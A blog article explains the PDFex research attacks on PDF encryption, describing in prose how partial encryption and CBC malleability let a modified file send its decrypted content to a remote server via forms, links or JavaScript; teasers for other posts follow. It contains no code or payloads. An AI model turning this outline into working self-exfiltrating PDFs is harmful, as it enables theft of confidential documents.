Skip to main content

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of a password-protected or encrypted PDF file without knowing the password?

Well, that's now possible, thanks to a set of attacking techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.

PDFex, the new techniques include two classes of attacks that take advantage of a vulnerability in the standard encryption protection built into the PDF (Portable Document Format). The PDFex doesn't allow an attacker to know or remove the password for an encrypted PDF file. But it allows an attacker to remotely exfiltrate content once a legitimate user opens that PDF file.

In other words, PDFex attack allows attackers to modify a password-protected or encrypted PDF file, without having the corresponding password, in a way that when opened by someone with the correct password, the file will automatically send out a copy of the decrypted content to a remote attacker.

PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.

It is important to note that the attack is targeting the encryption supported by the PDF (Portable Document Format) standard, not external applications.

PDFex Attacks Exploit Two PDF Vulnerabilities

Two major vulnerabilities of PDFex attacks are :

1. Partial Encryption

Standard PDF specification by design supports partial encryption that allows only strings and streams to be encrypted, while objects defining the PDF file's structure remains unencrypted.

Thus, support for the mixing of plaintexts with ciphertexts leaves an opportunity for attackers to easily manipulate the file structure and inject a malicious payload into it.

2. Ciphertext Malleability

PDF encryption uses the CBC (Cipher Block Chaining) encryption mode with no integrity checks, that can be used by attackers to create self-exfiltrating ciphertext parts.

PDFex Attack Classes: Direct Exfiltration and CBC Gadgets

Now, Let's understand the two classes of PDFex attacks.

Class A : Direct Exfiltration

Researchers Find New Hack To Read Content Of Password Protected PDF Files

It takes advantage of the partial encryption feature (means don't encrypt the entire PDF file, leaving some parts unencrypted) of a password-protected PDF file.

Thus, an attacker can modify the unencrypted field, add unencrypted objects and create a trapped PDF file that when decrypted and opened will attempt to send the file's content to an attacker.

This can be achieved in three ways :

1. By modifying a PDF file's unencrypted data to add a PDF form that auto submits the PDF's content to an attacker's server when the victim decrypts and opens an encrypted PDF file.

2. By modifying a PDF file's unencrypted data to add a link that automatically triggers when the victim decrypts and opens an encrypted PDF file.

3. By modifying a PDF file's unencrypted data to add JavaScript code that automatically runs when victims decrypts and opens an encrypted PDF file.

Out of three ways, the first one is easier to perform and most efficient as it doesn't require user interaction. The second one requires opening an external browser, and the user could prevent this. The third one is the less reliable method because many PDF apps limit JavaScript (JS) support due to security risks with having PDF files run JS code in the background.

As shown in the picture, the object which contains the link (in blue color) for form submission is not encrypted and completely controlled by an attacker.

Class B : CBC Gadgets

CBC gadgets mean that the ciphertext is modified to exfiltrate itself after decryption.

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Not all PDF viewers support partially encrypted documents, but many of them also don't have file integrity protection, which allows attackers to modify the unencrypted data directly within an encrypted object.

The attack scenario of CBC gadget is almost the same as the Direct Exfiltration attacks with the only difference that here attacker modifies the existing encrypted content (after a user opens encrypted PDF file) or create new content from CBC gadgets to add actions that define how to exfiltrate data.

Besides this, if a PDF file contains compressed streams to reduce the file size, attackers need to use half-open object streams to steal the data.

An attacker can use a CBC gadget to modify the encrypted content so that they create trapped PDF files that submit their own content to remote servers via PDF forms or URLs.

Among 27 widely used desktop and web PDF viewers, all of them are vulnerable to at least one of those attacks.

Researchers Find New Hack To Read Content Of Password Protected PDF Files

All of these attacks require that an attacker is in a position to modify encrypted PDF files. This includes a position to intercept the user's network traffic or having physical access to a storage system.

PDFex is a major vulnerability in the PDF standard and this must be fixed in future PDF specifications.

For more details of the PDFex attacks, you can go on to this website released by the researchers and the research paper titled, " Practical Decryption exFiltration: Breaking PDF Encryption." 

I hope you find useful information in this article. If you have any questions then please mention in the comments section and I will get back to you and stay tuned with my blog to learn interesting things related to cybersecurity and hacking.


Popular posts from this blog

How To Check If a Link Is Safe To Click

Many times, we share links among our friends on social media platforms like WhatsApp, Facebook, Instagram or Twitter. But do we know how safe they are? What can happen if you click on any malicious link? We never think of the following things : Links can drop various harmful programs, viruses on your device Links can steal your personal data by dropping spyware or keyloggers Use your browser for crypto mining which will affect your device's performance Even if your device is secured with antivirus, not all of them warn you before clicking such malicious links . And the moment you click on these, they will become big trouble for you. This can sometimes even be dangerous with regard to data security and identity theft. So, Be careful about what you click on. These days one of the quickest growing security issues is ransomware , which is often spread by the user unintentionally clicking dangerous links in emails, social media platforms, messengers, and other tool

TikTok Secretly Sent Users Private Data & PII Number to Chinese Server Including Draft Videos

The popular Android and iOS short-videos creating app, TikTok hit with a lawsuit claims that the app illegally and secretly transfers app's users' private sensitive data and Personally Identifiable Information (PII) to Chinese servers. TikTok which is a 15-second short-video creating app especially popular among the younger generation and also downloaded over 1.3 Billion times worldwide . TikTok remains top in the most downloaded app list for months on the Apple App Store and Google Play Store.  According to the lawsuit, Tiktok shared the user's created videos which include private acts and closeups of user's faces (biometric data) before the videos are saved on the app. TikTok provides many options includes the next button, close button, and button for effects to its users while recording the video. Here, the next button takes users to the screen that shows these two options : "post" and "save".  After clicking on the "next" button, Tik

Facebook, Instagram and WhatsApp Down : Apps Crash For Users Worldwide Including In India

If you are facing problems with Facebook , Instagram , and WhatsApp on your device then you are not alone. Suddenly, the service of Facebook, Instagram, and WhatsApp's are facing technical problems since late evening on Wednesday. Users are facing these types of problems on Facebook :- While using Facebook, Users are facing problems in loading images, loading videos, and loading all other data across its apps while some users were unable to load photos on Facebook News Feed. On the Twitter platform, Facebook said that it is aware of the issue. Users are facing these types of problems on Instagram :- On Instagram (just like Facebook apps), the issues appear to be limited only to a certain part of the site. Many users report an issue to Instagram that their feed might not load, also it is not possible to post anything new (images, videos, stories) into it. If a user tries to post anything new (images, videos, stories) brings up an error indicat